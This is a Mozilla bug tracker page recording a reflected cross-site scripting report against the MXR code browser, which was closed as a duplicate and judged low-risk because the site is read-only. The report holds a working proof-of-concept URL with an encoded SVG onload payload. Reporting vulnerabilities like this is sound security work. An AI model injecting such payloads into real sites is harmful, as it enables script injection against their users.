Cross-site Scripting (XSS)

RESOLVED DUPLICATE of bug 949514

Status

()

RESOLVED DUPLICATE of bug 949514
4 years ago
2 years ago

People

(Reporter: balag2012mail, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

4 years ago
Created attachment 8541895 [details]
Mozilla.png

User Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Steps to reproduce:

Vulnerable URL & Proof of Concept :
======================

http://mxr.mozilla.org/mozilla-central/source/nsprpub/pr/include/prtime.h/%3Csvg%20onload=prompt%28%22XSS%22%29%3E
This is a duplicate issue and has been publicly reported. It is also not dangerous since MXR (and LXR) are read-only sites.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 949514

Updated

3 years ago
Group: core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.